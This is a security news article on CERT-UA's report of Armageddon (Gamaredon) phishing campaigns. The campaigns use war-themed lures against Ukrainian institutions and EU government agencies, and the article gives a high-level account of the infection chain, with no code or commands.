New phishing efforts ascribed to the Russian threat organization known as Armageddon (Gamaredon) have been discovered by Ukraine’s Computer Emergency Response Team (CERT-UA). The malicious emails try to dupe users with lures inspired by the Ukraine conflict and infect target computers with espionage-focused malware. CERT-UA has discovered two different incidents, one aimed at Ukrainian institutions and the other at European Union government agencies.
Armageddon is a Russian state-sponsored threat actor that has been attacking Ukraine since at least 2014 and is thought to be affiliated with the FSB (Russian Federal Security Service). According to a thorough technical study provided by the Ukrainian secret agency in November 2021, Armageddon has conducted at least 5,000 cyber-attacks against 1,500 vital businesses in Ukraine.
Members of the Armageddon cyber-force had already been identified, their toolkit disclosed, and bespoke malware creation efforts connected to Russian hacker forums by Ukrainian troops. As a result, even in chaotic wartime conditions where cyber-response teams have limited resources and time, some attributions can be established with increased confidence because of previous comprehensive attribution efforts.
Armageddon’s Ukraine-focused campaign sends out emails with “Information on war criminals of the Russian Federation” to various government institutions in the nation. The emails received from “Vadim_melnik88@i[.]ua” include an HTML attachment that, according to CERT-UA, has poor detection rates by security software.
When the file is opened, a RAR file is produced and thrown on the computer, ostensibly holding the identity information of people guilty of war crimes in Ukraine in a shortcut file (.lnk). On the other hand, clicking on this LNK file will download another HTA file packed with VBScript code that will run a PowerShell script to get the ultimate payload.
In its campaign focusing on several EU government leaders, Armageddon employs RAR archive attachments titled “Assistance” and “Necessary_military_assistance.” Shortcut files (.lnk) in the archives include lists of items needed for military and humanitarian help to Ukraine. Opening that file starts the malware infection chain mentioned in the preceding section. The sender’s address is “info@military-ukraine[.]site,” which appears to be authentic, and the signee is said to be Ukraine’s Deputy Commander for Armaments and Major General.
At least one example of these emails reaching the Latvian government’s mailbox has been confirmed by the CERT-UA. As a result, other European countries are likely to be targeted by the same effort. This report is in harmony with other latest discoveries of Russia-based attacks targeting EU entities, including last week’s Google TAG phishing campaign report, GPS system interference in the Baltic region, wiper-malware deployment against the KA-SAT satellite service, and phishing attacks against those assisting with the refugee crisis.